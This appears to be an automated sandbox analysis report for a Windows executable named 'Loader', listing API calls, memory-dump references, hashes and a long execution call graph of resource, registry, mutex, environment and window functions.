                                                                                                                                                                                                                                                                                                                Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:23.2%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:3.9%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:686
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:13
                                                                                                                                                                                                                                                                                                                execution_graph 1727 404040 1728 404070 FindResourceExA 1727->1728 1729 40405a 1727->1729 1730 4040b4 LoadResource 1728->1730 1731 40426c SetLastError 1728->1731 1732 404110 atoi 1730->1732 1733 4040cd LockResource 1730->1733 1734 404284 fprintf 1731->1734 1735 404126 1732->1735 1736 404208 1732->1736 1733->1732 1740 4040de 1733->1740 1734->1732 1755 402cb0 1735->1755 1738 402cb0 45 API calls 1736->1738 1741 40413b 1738->1741 1739 404155 1742 4041a5 strcpy 1739->1742 1744 404168 1739->1744 1745 40423a 1739->1745 1740->1732 1740->1734 1743 404103 1740->1743 1741->1739 1748 402cb0 45 API calls 1741->1748 1746 4041c3 fprintf 1742->1746 1747 4041f4 1742->1747 1743->1732 1749 402cb0 45 API calls 1744->1749 1750 402cb0 45 API calls 1745->1750 1746->1747 1748->1739 1753 40417d 1749->1753 1750->1753 1752 404197 1752->1729 1752->1742 1753->1752 1754 402cb0 45 API calls 1753->1754 1754->1752 1756 402d50 FindResourceExA 1755->1756 1757 402cd3 1755->1757 1760 402d94 LoadResource 1756->1760 1761 402e39 SetLastError 1756->1761 1758 402d10 1757->1758 1759 402cd8 1757->1759 1765 402ce3 1758->1765 1766 402920 39 API calls 1758->1766 1759->1765 1767 402920 39 API calls 1759->1767 1762 402e00 atoi 1760->1762 1763 402dad LockResource 1760->1763 1761->1762 1762->1759 1763->1762 1769 402dbe 1763->1769 1764 402ce8 1764->1741 1765->1764 1772 402920 1765->1772 1766->1765 1767->1765 1769->1762 1771 402ddf fprintf 1769->1771 1770 402d26 1770->1741 1771->1762 1773 402970 RegOpenKeyExA 1772->1773 1774 402946 fprintf 1772->1774 1776 4029a4 1773->1776 1777 4029ac memset memset memset 1773->1777 1774->1773 1776->1770 1778 402a4f RegEnumKeyExA 1777->1778 1779 402aa9 strcpy strlen 1778->1779 1780 402c8b RegCloseKey 1778->1780 1781 402ac7 1779->1781 1782 402acd strcat 1779->1782 1780->1770 1781->1782 1783 402bf0 fprintf 1782->1783 1784 402aec strchr 1782->1784 1783->1770 1785 402b07 strlen 1784->1785 1786 402b1b strcpy 1784->1786 1785->1786 1787 402c30 strncpy strlen strcat 1785->1787 1788 402b33 strcmp 1786->1788 1787->1788 1793 402a37 1788->1793 1789 402bd6 fprintf 1789->1770 1790 402a18 strcmp 1791 402b5f strcmp 1790->1791 1790->1793 1791->1793 1793->1778 1793->1789 1793->1790 1793->1791 1795 402b98 strcpy strcpy 1793->1795 1796 4027a0 memset RegOpenKeyExA 1793->1796 1795->1789 1795->1793 1797 402830 memset RegQueryValueExA 1796->1797 1798 402814 1796->1798 1799 4028ed RegCloseKey 1797->1799 1801 402894 1797->1801 1798->1793 1799->1798 1800 402906 strcpy 1799->1800 1800->1798 1801->1801 1802 4028e3 1801->1802 1803 4028bd strlen 1801->1803 1808 402690 memset 1802->1808 1805 4028d2 strcat 1803->1805 1806 4028cc 1803->1806 1805->1802 1806->1805 1809 402708 strcpy 1808->1809 1810 4026c9 1808->1810 1812 402776 strlen 1809->1812 1813 40271e strlen 1809->1813 1811 4026f9 1810->1811 1814 4026e0 fprintf 1810->1814 1815 4026db 1810->1815 1811->1799 1816 40272d strcat _stat 1812->1816 1813->1816 1814->1811 1815->1814 1816->1810 1818 402762 SetLastError 1816->1818 1818->1810 2149 401000 2150 401061 2149->2150 2151 40101e 2149->2151 2152 40102a signal 2150->2152 2154 401025 2150->2154 2155 401087 2150->2155 2153 401080 2151->2153 2151->2154 2157 4010bb signal 2152->2157 2160 401041 2152->2160 2153->2155 2156 4010e2 signal 2153->2156 2154->2152 2159 401071 2154->2159 2155->2160 2161 40108e signal 2155->2161 2158 401129 signal 2156->2158 2156->2160 2157->2160 2158->2160 2161->2160 2162 40110f signal 2161->2162 2162->2160 2163 403700 GlobalMemoryStatusEx 2168 4033f0 FindResourceExA 2163->2168 2166 4033f0 18 API calls 2167 403781 2166->2167 2169 403450 LoadResource 2168->2169 2170 4036e8 SetLastError 2168->2170 2171 4034c0 atoi FindResourceExA 2169->2171 2172 403468 LockResource 2169->2172 2173 4036d0 SetLastError 2171->2173 2174 40350e LoadResource 2171->2174 2172->2171 2178 403479 2172->2178 2173->2170 2175 403580 atoi 2174->2175 2176 403527 LockResource 2174->2176 2183 4035ce 2175->2183 2176->2175 2177 403538 2176->2177 2177->2175 2181 40355f fprintf 2177->2181 2178->2171 2179 40349f fprintf 2178->2179 2179->2171 2180 403651 2180->2166 2181->2175 2182 403604 2185 40366a fprintf 2182->2185 2186 40360d strcat strlen _itoa strlen 2182->2186 2183->2180 2183->2182 2184 4036a7 fprintf 2183->2184 2184->2182 2185->2186 2186->2180 1819 401dc5 1820 401dd0 GetModuleHandleA GetProcAddress 1819->1820 1821 401e00 GetCurrentProcess 1820->1821 1822 401e13 1820->1822 1821->1822 1823 401e48 1822->1823 1824 401e33 fprintf 1822->1824 1824->1823 2187 401b87 memset strncpy strlen fopen 1825 40124a _setmode 1826 4011bb 1825->1826 1827 4011e0 1826->1827 1828 4011c0 _setmode 1826->1828 1829 401200 __p__fmode 1827->1829 1830 4011e5 _setmode 1827->1830 1828->1827 1831 406b30 1829->1831 1830->1829 1832 401212 __p__environ 1831->1832 1833 406a10 427 API calls 1832->1833 1834 401237 _cexit ExitProcess 1833->1834 1835 40334c 1836 403350 GetCurrentDirectoryA 1835->1836 1850 40320b 1836->1850 1837 4032f0 fprintf 1837->1850 1838 403160 strchr 1840 40317b strchr 1838->1840 1841 4033cc strcat 1838->1841 1839 4032e0 1840->1839 1842 40319d strncat strncat strlen 1840->1842 1841->1839 1843 403317 strncat 1842->1843 1842->1850 1843->1850 1844 403335 strcat 1844->1836 1844->1850 1845 403377 strcat 1845->1850 1846 40326c strstr 1847 403291 GetEnvironmentVariableA 1846->1847 1846->1850 1849 4033b2 strcat 1847->1849 1847->1850 1849->1850 1850->1836 1850->1837 1850->1838 1850->1839 1850->1844 1850->1845 1850->1846 1851 4023b0 strstr 1850->1851 1852 4023d6 strstr 1851->1852 1853 402448 strchr strrchr 1851->1853 1852->1853 1856 4023f0 strstr 1852->1856 1854 402503 RegOpenKeyExA 1853->1854 1855 402485 RegOpenKeyExA 1853->1855 1858 4024ae RegQueryValueExA RegCloseKey 1854->1858 1859 40252c 1854->1859 1857 4024f4 1855->1857 1855->1858 1856->1853 1860 40240a strstr 1856->1860 1857->1850 1858->1857 1859->1855 1860->1853 1861 402424 strstr 1860->1861 1861->1853 1862 40243e 1861->1862 1862->1850 1863 4030cc 1864 4030d0 strcat strlen 1863->1864 1865 401fcc 1866 401fd0 FormatMessageA 1865->1866 1867 402013 strlen strcat LocalFree 1866->1867 1868 402096 fprintf 1866->1868 1868->1867 1869 402e4e 1870 402e50 1869->1870 1871 402e70 1870->1871 1872 402ea1 1870->1872 1873 402cb0 45 API calls 1871->1873 1874 402cb0 45 API calls 1872->1874 1875 402e81 1873->1875 1874->1875 1507 401290 __set_app_type 1510 401150 SetUnhandledExceptionFilter 1507->1510 1524 406b60 1510->1524 1512 40116e __getmainargs 1513 401200 __p__fmode 1512->1513 1514 4011a8 1512->1514 1525 406b30 1513->1525 1516 4011bb 1514->1516 1520 40124a _setmode 1514->1520 1517 4011e0 1516->1517 1518 4011c0 _setmode 1516->1518 1517->1513 1521 4011e5 _setmode 1517->1521 1518->1517 1520->1516 1521->1513 1524->1512 1526 401212 __p__environ 1525->1526 1527 406a10 1526->1527 1528 406a24 1527->1528 1529 406a29 GetCommandLineA GetStartupInfoA 1528->1529 1530 406a42 GetModuleHandleA 1529->1530 1532 406b00 1530->1532 1535 4013b0 1532->1535 1592 405d30 1535->1592 1537 4013c7 1538 4013d2 1537->1538 1539 40185b memset 1537->1539 1540 4013d5 1538->1540 1682 4021a0 FindResourceExA 1538->1682 1541 4020c0 5 API calls 1539->1541 1696 401ed0 GetLastError 1540->1696 1544 401888 1541->1544 1547 4018bc FindWindowExA 1544->1547 1551 40188e ShowWindow SetForegroundWindow 1544->1551 1553 4018e9 GetWindowTextA strstr 1544->1553 1545 4013fc 1548 401402 strstr 1545->1548 1549 40141b 1545->1549 1546 4013da 1550 401237 _cexit ExitProcess 1546->1550 1547->1544 1548->1549 1554 4021a0 5 API calls 1549->1554 1552 401c10 fclose 1551->1552 1552->1544 1553->1551 1555 401915 FindWindowExA 1553->1555 1556 40142f 1554->1556 1555->1544 1555->1553 1557 40143c 1556->1557 1558 4021a0 5 API calls 1556->1558 1559 401458 CreateWindowExA 1557->1559 1561 401591 1557->1561 1560 4015f5 1558->1560 1562 401616 1559->1562 1583 4014cc 1559->1583 1560->1557 1563 4015fd strstr 1560->1563 1565 4014d6 SetTimer 1561->1565 1566 4017ee 1561->1566 1587 40159b fprintf 1561->1587 1588 4015cc 1561->1588 1712 406830 CloseHandle CloseHandle 1561->1712 1716 4020c0 FindResourceExA 1562->1716 1563->1557 1563->1562 1565->1540 1565->1583 1571 401837 fwrite 1566->1571 1572 4017fc 1566->1572 1567 401642 1569 401646 atoi 1567->1569 1570 40165d 1567->1570 1569->1570 1573 4021a0 5 API calls 1570->1573 1571->1572 1724 406830 CloseHandle CloseHandle 1572->1724 1575 401686 1573->1575 1577 4016a3 1575->1577 1578 40168a strstr 1575->1578 1576 401801 1580 401c10 fclose 1576->1580 1581 4021a0 5 API calls 1577->1581 1578->1577 1579 40155d GetMessageA 1582 401547 TranslateMessage DispatchMessageA 1579->1582 1579->1583 1580->1546 1584 4016b9 LoadImageA 1581->1584 1582->1579 1583->1540 1583->1561 1583->1565 1583->1566 1583->1579 1689 406860 1583->1689 1584->1540 1586 4016f4 7 API calls 1584->1586 1586->1561 1587->1561 1589 401817 fprintf 1588->1589 1590 4015da 1588->1590 1589->1571 1713 401c10 1590->1713 1725 406c70 1592->1725 1594 405d3d GetModuleHandleA 1595 405d70 memset GetModuleFileNameA 1594->1595 1596 405d60 1594->1596 1597 406350 1595->1597 1598 405df8 strrchr 1595->1598 1596->1537 1597->1537 1598->1597 1599 405e1c 1598->1599 1600 401c30 12 API calls 1599->1600 1601 405e35 1600->1601 1601->1596 1602 405e3f GetModuleHandleA GetProcAddress 1601->1602 1603 405e68 GetCurrentProcess 1602->1603 1604 405e7b 1602->1604 1603->1604 1605 405eb0 FindResourceExA 1604->1605 1606 405e96 1604->1606 1607 405e9b fprintf 1604->1607 1608 405ee3 LoadResource 1605->1608 1609 40638b SetLastError 1605->1609 1606->1607 1607->1605 1610 405f35 FindResourceExA 1608->1610 1611 405efc LockResource 1608->1611 1612 4063a6 SetLastError 1609->1612 1610->1612 1613 405f68 LoadResource 1610->1613 1611->1610 1614 405f0d 1611->1614 1619 4063c1 SetLastError 1612->1619 1615 405f81 LockResource 1613->1615 1616 405fba FindResourceExA 1613->1616 1614->1610 1624 40641f fprintf 1614->1624 1615->1616 1622 405f92 1615->1622 1617 406361 SetLastError 1616->1617 1618 405fed LoadResource 1616->1618 1646 406323 1617->1646 1620 40600a LockResource 1618->1620 1618->1646 1621 4063dc SetLastError 1619->1621 1629 40601f 1620->1629 1620->1646 1626 4063f7 fprintf 1621->1626 1622->1616 1627 406447 fprintf 1622->1627 1623 40632c fprintf 1623->1597 1624->1610 1628 406047 memset FindResourceExA 1626->1628 1627->1616 1628->1619 1630 406097 LoadResource 1628->1630 1629->1626 1629->1628 1631 4060b0 LockResource 1630->1631 1632 4060c1 1630->1632 1631->1632 1633 406138 memset memset GetCurrentDirectoryA FindResourceExA 1632->1633 1634 4060ef CreateMutexA GetLastError 1632->1634 1643 406796 fprintf 1632->1643 1633->1621 1636 4061bd LoadResource 1633->1636 1634->1633 1635 40646f 1634->1635 1637 406482 fprintf 1635->1637 1638 406478 1635->1638 1639 406266 1636->1639 1640 4061da LockResource 1636->1640 1637->1596 1638->1596 1641 404740 162 API calls 1639->1641 1640->1639 1648 4061eb 1640->1648 1642 406278 1641->1642 1642->1596 1644 406282 6 API calls 1642->1644 1643->1632 1645 4064c0 strlen strcat SetEnvironmentVariableA 1644->1645 1644->1646 1645->1646 1649 406502 1645->1649 1646->1597 1646->1623 1647 406214 strncpy strlen 1651 406239 1647->1651 1652 40623f strcat _chdir 1647->1652 1648->1647 1650 4067b9 fprintf 1648->1650 1654 4051e0 38 API calls 1649->1654 1650->1647 1651->1652 1652->1639 1653 4064a6 fprintf 1652->1653 1653->1639 1655 406514 FindResourceExA 1654->1655 1656 406811 SetLastError 1655->1656 1657 40655b LoadResource 1655->1657 1658 4065c4 atoi 1657->1658 1659 406574 LockResource 1657->1659 1660 4067e2 strlen 1658->1660 1661 4065df strlen 1658->1661 1659->1658 1666 406585 1659->1666 1664 4067f7 1660->1664 1662 406600 strcat GlobalMemoryStatusEx 1661->1662 1663 4065f4 1661->1663 1665 4033f0 18 API calls 1662->1665 1663->1662 1664->1656 1667 406671 1665->1667 1666->1658 1668 4065a6 fprintf 1666->1668 1669 4033f0 18 API calls 1667->1669 1668->1658 1670 4066af memset 1669->1670 1671 403790 16 API calls 1670->1671 1672 4066d6 1671->1672 1673 403100 27 API calls 1672->1673 1674 4066fa 1673->1674 1675 405390 85 API calls 1674->1675 1676 406706 1675->1676 1677 405b60 14 API calls 1676->1677 1678 406711 1677->1678 1678->1638 1679 406724 fprintf 1678->1679 1679->1638 1680 406747 fprintf 1679->1680 1680->1638 1681 40676b strlen fprintf 1680->1681 1681->1596 1683 40227d SetLastError 1682->1683 1684 4021ed LoadResource 1682->1684 1683->1545 1685 402260 1684->1685 1686 402206 LockResource 1684->1686 1685->1545 1686->1685 1687 402217 1686->1687 1687->1685 1688 40223f fprintf 1687->1688 1688->1685 1690 406c70 1689->1690 1691 406870 6 API calls 1690->1691 1692 406970 1691->1692 1693 40694d 1691->1693 1692->1583 1694 406983 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle 1693->1694 1695 406954 1693->1695 1694->1695 1695->1583 1697 402058 fprintf 1696->1697 1698 401eeb 1696->1698 1700 402077 fprintf 1697->1700 1699 401fd0 FormatMessageA 1698->1699 1701 401fa0 MessageBoxA 1698->1701 1702 401f01 1698->1702 1703 402013 strlen strcat LocalFree 1699->1703 1704 402096 fprintf 1699->1704 1700->1704 1701->1699 1707 401f16 1701->1707 1705 401f70 printf 1702->1705 1706 401f0a puts 1702->1706 1703->1546 1704->1703 1705->1707 1706->1707 1707->1700 1708 401f62 1707->1708 1709 401f2c ShellExecuteA 1707->1709 1710 401f90 fclose 1708->1710 1711 401f6b 1708->1711 1709->1708 1710->1546 1711->1546 1712->1561 1714 401c21 fclose 1713->1714 1715 401c1f 1713->1715 1714->1546 1715->1546 1717 40215b SetLastError 1716->1717 1718 4020fb LoadResource 1716->1718 1719 402170 1717->1719 1718->1719 1720 402114 LockResource 1718->1720 1719->1567 1720->1719 1721 402125 1720->1721 1722 40214f 1721->1722 1723 402179 fprintf 1721->1723 1722->1567 1723->1722 1724->1576 1726 406c76 1725->1726 1882 402e50 1883 402e70 1882->1883 1884 402ea1 1882->1884 1885 402cb0 45 API calls 1883->1885 1886 402cb0 45 API calls 1884->1886 1887 402e81 1885->1887 1886->1887 1888 401dd0 GetModuleHandleA GetProcAddress 1889 401e00 GetCurrentProcess 1888->1889 1891 401e13 1888->1891 1889->1891 1890 401e48 1891->1890 1892 401e33 fprintf 1891->1892 1892->1890 1893 4030d0 strcat strlen 1894 4012d0 memset 1895 4020c0 5 API calls 1894->1895 1896 401309 1895->1896 1897 401311 FindWindowExA 1896->1897 1898 40138d 1896->1898 1897->1898 1899 401338 1897->1899 1900 401340 GetWindowTextA strstr 1899->1900 1901 401397 1900->1901 1902 401368 FindWindowExA 1900->1902 1902->1898 1902->1900 1903 4050d0 1904 406c70 1903->1904 1905 4050e0 6 API calls 1904->1905 1906 4051a0 strlen strcat SetEnvironmentVariableA 1905->1906 1907 40516e 1905->1907 1906->1907 1910 4051d6 1906->1910 1908 405183 fprintf 1907->1908 1909 405177 1907->1909 1908->1909 2193 405010 2194 406c70 2193->2194 2195 40501d memset GetEnvironmentVariableA strlen 2194->2195 2196 405086 strlen strcat SetEnvironmentVariableA 2195->2196 2197 405077 2195->2197 1911 403659 1912 403660 1911->1912 1913 40366a fprintf 1912->1913 1914 40360d strcat strlen _itoa strlen 1912->1914 1913->1914 1915 403651 1914->1915 1916 401959 1917 401960 GetWindowThreadProcessId 1916->1917 1918 401993 GetWindowLongA 1917->1918 1919 401987 1917->1919 1918->1919 1920 4019ae ShowWindow 1918->1920 1920->1919 1921 405cdc 1927 405c6c 1921->1927 1922 405c50 strcpy strstr 1923 405ca5 1922->1923 1922->1927 1924 405c40 1923->1924 1925 405cae strlen strcat 1923->1925 1925->1924 1926 405c70 strchr 1926->1927 1928 405c8b strstr 1926->1928 1927->1922 1927->1926 1927->1928 1928->1923 1928->1926 2198 40261c 2199 402620 2198->2199 2200 402660 strlen 2199->2200 2201 402633 strlen 2199->2201 2202 402675 strcat 2200->2202 2203 40266f 2200->2203 2204 402642 2201->2204 2205 402648 strcat 2201->2205 2203->2202 2204->2205 2206 406a9c 2207 406aa0 GetModuleHandleA 2206->2207 2209 406b00 2207->2209 2210 4013b0 424 API calls 2209->2210 2211 406b1a 2210->2211 1929 4052de 1930 4052e0 SetEnvironmentVariableA 1929->1930 1931 4052ff strtok 1930->1931 1932 405364 1931->1932 1933 40530a strchr 1931->1933 1937 403100 1933->1937 1936 405346 fprintf 1936->1930 1938 406c70 1937->1938 1939 403110 memset memset 1938->1939 1940 4032e0 1939->1940 1941 40315f 1939->1941 1940->1930 1940->1936 1941->1940 1942 403160 strchr 1941->1942 1947 403335 strcat 1941->1947 1948 403350 GetCurrentDirectoryA 1941->1948 1949 4032f0 fprintf 1941->1949 1950 403377 strcat 1941->1950 1951 40326c strstr 1941->1951 1953 4023b0 11 API calls 1941->1953 1943 40317b strchr 1942->1943 1944 4033cc strcat 1942->1944 1943->1940 1945 40319d strncat strncat strlen 1943->1945 1944->1940 1945->1941 1946 403317 strncat 1945->1946 1946->1941 1947->1941 1947->1948 1948->1941 1949->1941 1950->1941 1951->1941 1952 403291 GetEnvironmentVariableA 1951->1952 1952->1941 1954 4033b2 strcat 1952->1954 1953->1941 1954->1941 1955 402ede 1956 402ee0 1955->1956 1957 402ff0 1956->1957 1958 402ef7 1956->1958 1959 402cb0 45 API calls 1957->1959 1960 402cb0 45 API calls 1958->1960 1962 403005 1959->1962 1961 402f0c 1960->1961 1963 402f26 1961->1963 1964 402cb0 45 API calls 1961->1964 1962->1963 1966 402cb0 45 API calls 1962->1966 1965 402f90 strcpy 1963->1965 1967 402f43 1963->1967 1968 403027 1963->1968 1964->1963 1969 402fad fprintf 1965->1969 1970 402fde 1965->1970 1966->1963 1971 402cb0 45 API calls 1967->1971 1972 402cb0 45 API calls 1968->1972 1969->1970 1974 402f58 1971->1974 1975 40303c 1972->1975 1977 402cb0 45 API calls 1974->1977 1978 402f76 1974->1978 1976 402cb0 45 API calls 1975->1976 1975->1978 1976->1978 1977->1978 1978->1965 1978->1970 1979 401e60 1980 401ea0 MessageBoxA 1979->1980 1982 401e73 printf 1979->1982 1983 401960 GetWindowThreadProcessId 1984 401993 GetWindowLongA 1983->1984 1985 401987 1983->1985 1984->1985 1986 4019ae ShowWindow 1984->1986 1986->1985 1987 4019e0 1988 401a20 GetExitCodeProcess 1987->1988 1989 4019ef 1987->1989 1990 401a73 1988->1990 1991 401a46 KillTimer PostQuitMessage 1988->1991 1992 401a90 ShowWindow 1989->1992 1993 4019fc 1989->1993 1990->1991 1996 401a6f 1990->1996 1991->1996 1992->1988 1997 401abd 1992->1997 1994 401b00 EnumWindows 1993->1994 1995 401a12 1993->1995 1994->1988 1995->1988 1997->1988 1998 401acb KillTimer 1997->1998 1999 401ed0 13 API calls 1998->1999 2000 401ae7 PostQuitMessage 1999->2000 2000->1988 2001 402ee0 2002 402ff0 2001->2002 2003 402ef7 2001->2003 2004 402cb0 45 API calls 2002->2004 2005 402cb0 45 API calls 2003->2005 2007 403005 2004->2007 2006 402f0c 2005->2006 2008 402f26 2006->2008 2009 402cb0 45 API calls 2006->2009 2007->2008 2011 402cb0 45 API calls 2007->2011 2010 402f90 strcpy 2008->2010 2012 402f43 2008->2012 2013 403027 2008->2013 2009->2008 2014 402fad fprintf 2010->2014 2015 402fde 2010->2015 2011->2008 2016 402cb0 45 API calls 2012->2016 2017 402cb0 45 API calls 2013->2017 2014->2015 2019 402f58 2016->2019 2020 40303c 2017->2020 2022 402cb0 45 API calls 2019->2022 2023 402f76 2019->2023 2021 402cb0 45 API calls 2020->2021 2020->2023 2021->2023 2022->2023 2023->2010 2023->2015 2024 4025e0 strlen 2025 402601 2024->2025 2212 402620 2213 402660 strlen 2212->2213 2214 402633 strlen 2212->2214 2215 402675 strcat 2213->2215 2216 40266f 2213->2216 2217 402642 2214->2217 2218 402648 strcat 2214->2218 2216->2215 2217->2218 2219 401b20 GetModuleHandleA 2220 401b40 2219->2220 2026 404069 2027 404070 FindResourceExA 2026->2027 2028 4040b4 LoadResource 2027->2028 2029 40426c SetLastError 2027->2029 2030 404110 atoi 2028->2030 2031 4040cd LockResource 2028->2031 2032 404284 fprintf 2029->2032 2033 404126 2030->2033 2034 404208 2030->2034 2031->2030 2038 4040de 2031->2038 2032->2030 2035 402cb0 45 API calls 2033->2035 2036 402cb0 45 API calls 2034->2036 2039 40413b 2035->2039 2036->2039 2037 404155 2040 4041a5 strcpy 2037->2040 2042 404168 2037->2042 2043 40423a 2037->2043 2038->2030 2038->2032 2041 404103 2038->2041 2039->2037 2046 402cb0 45 API calls 2039->2046 2044 4041c3 fprintf 2040->2044 2045 4041f4 2040->2045 2041->2030 2047 402cb0 45 API calls 2042->2047 2048 402cb0 45 API calls 2043->2048 2044->2045 2046->2037 2051 40417d 2047->2051 2048->2051 2050 404197 2050->2040 2052 40405a 2050->2052 2051->2050 2053 402cb0 45 API calls 2051->2053 2053->2050 2054 401269 2055 401270 __set_app_type 2054->2055 2056 401150 436 API calls 2055->2056 2057 401288 2056->2057 2058 4013e9 2059 4013f0 2058->2059 2060 4021a0 5 API calls 2059->2060 2061 4013fc 2060->2061 2062 401402 strstr 2061->2062 2063 40141b 2061->2063 2062->2063 2064 4021a0 5 API calls 2063->2064 2065 40142f 2064->2065 2066 40143c 2065->2066 2067 4021a0 5 API calls 2065->2067 2068 401458 CreateWindowExA 2066->2068 2080 4014cc 2066->2080 2069 4015f5 2067->2069 2070 401616 2068->2070 2068->2080 2069->2066 2071 4015fd strstr 2069->2071 2072 4020c0 5 API calls 2070->2072 2071->2066 2071->2070 2075 401642 2072->2075 2073 4014d6 SetTimer 2076 4013d5 2073->2076 2073->2080 2074 4017ee 2082 401837 fwrite 2074->2082 2083 4017fc 2074->2083 2078 401646 atoi 2075->2078 2079 40165d 2075->2079 2081 401ed0 13 API calls 2076->2081 2077 406860 10 API calls 2077->2080 2078->2079 2084 4021a0 5 API calls 2079->2084 2080->2073 2080->2074 2080->2076 2080->2077 2090 40155d GetMessageA 2080->2090 2097 40159b fprintf 2080->2097 2098 4015cc 2080->2098 2103 406830 CloseHandle CloseHandle 2080->2103 2102 4013da 2081->2102 2082->2083 2104 406830 CloseHandle CloseHandle 2083->2104 2086 401686 2084->2086 2088 4016a3 2086->2088 2089 40168a strstr 2086->2089 2087 401801 2091 401c10 fclose 2087->2091 2092 4021a0 5 API calls 2088->2092 2089->2088 2090->2080 2093 401547 TranslateMessage DispatchMessageA 2090->2093 2091->2102 2094 4016b9 LoadImageA 2092->2094 2093->2090 2094->2076 2096 4016f4 7 API calls 2094->2096 2096->2080 2097->2080 2099 401817 fprintf 2098->2099 2100 4015da 2098->2100 2099->2082 2101 401c10 fclose 2100->2101 2101->2102 2103->2080 2104->2087 2221 402829 2222 402830 memset RegQueryValueExA 2221->2222 2223 4028ed RegCloseKey 2222->2223 2225 402894 2222->2225 2224 402906 strcpy 2223->2224 2226 402814 2223->2226 2224->2226 2225->2225 2227 4028e3 2225->2227 2228 4028bd strlen 2225->2228 2229 402690 8 API calls 2227->2229 2230 4028d2 strcat 2228->2230 2231 4028cc 2228->2231 2232 4028eb 2229->2232 2230->2227 2231->2230 2232->2223 2105 402bec 2106 402bf0 fprintf 2105->2106 2107 401270 __set_app_type 2108 401150 436 API calls 2107->2108 2109 401288 2108->2109 2233 4022b0 FindResourceExA 2234 4022fd LoadResource 2233->2234 2235 40237f SetLastError atoi 2233->2235 2236 402370 atoi 2234->2236 2237 402316 LockResource 2234->2237 2237->2236 2238 402327 2237->2238 2238->2236 2239 40234f fprintf 2238->2239 2239->2236 2110 403071 2111 403080 GetModuleFileNameA 2110->2111 2112 4030b0 strrchr 2111->2112 2113 4030c5 2111->2113 2112->2113 2114 4039f1 2115 403a00 memset FindResourceExA 2114->2115 2116 403b38 SetLastError 2115->2116 2117 403a5a LoadResource 2115->2117 2118 403ad0 2116->2118 2119 403ad9 2116->2119 2117->2118 2120 403a72 LockResource 2117->2120 2118->2119 2121 403ae3 CreateMutexA GetLastError 2118->2121 2120->2118 2125 403a83 2120->2125 2121->2119 2122 403b28 2121->2122 2123 403b31 2122->2123 2124 403b59 fprintf 2122->2124 2124->2123 2125->2118 2126 403aaf fprintf 2125->2126 2126->2118 2240 402531 2241 402540 strchr 2240->2241 2242 40257d 2241->2242 2243 40256d strlen 2241->2243 2244 402597 strncpy strlen 2242->2244 2243->2242 2243->2244 2127 403b77 memset memset GetCurrentDirectoryA FindResourceExA 2128 403c10 LoadResource 2127->2128 2129 403cd7 SetLastError 2127->2129 2130 403cd0 2128->2130 2131 403c2d LockResource 2128->2131 2131->2130 2133 403c42 2131->2133 2132 403c73 strncpy strlen 2135 403c98 2132->2135 2136 403c9e strcat _chdir 2132->2136 2133->2132 2134 403cf4 fprintf 2133->2134 2134->2132 2135->2136 2136->2130 2137 403cbb fprintf 2136->2137 2137->2130 2138 401afc 2139 401b00 EnumWindows 2138->2139 2140 401a20 GetExitCodeProcess 2139->2140 2141 401a73 2140->2141 2142 401a46 KillTimer PostQuitMessage 2140->2142 2141->2142 2143 401a6f 2141->2143 2142->2143 2144 40397e 2145 403900 2144->2145 2146 403968 _close 2145->2146 2147 403957 strlen 2145->2147 2148 403976 2146->2148 2147->2146

                                                                                                                                                                                                                                                                                                                Callgraph

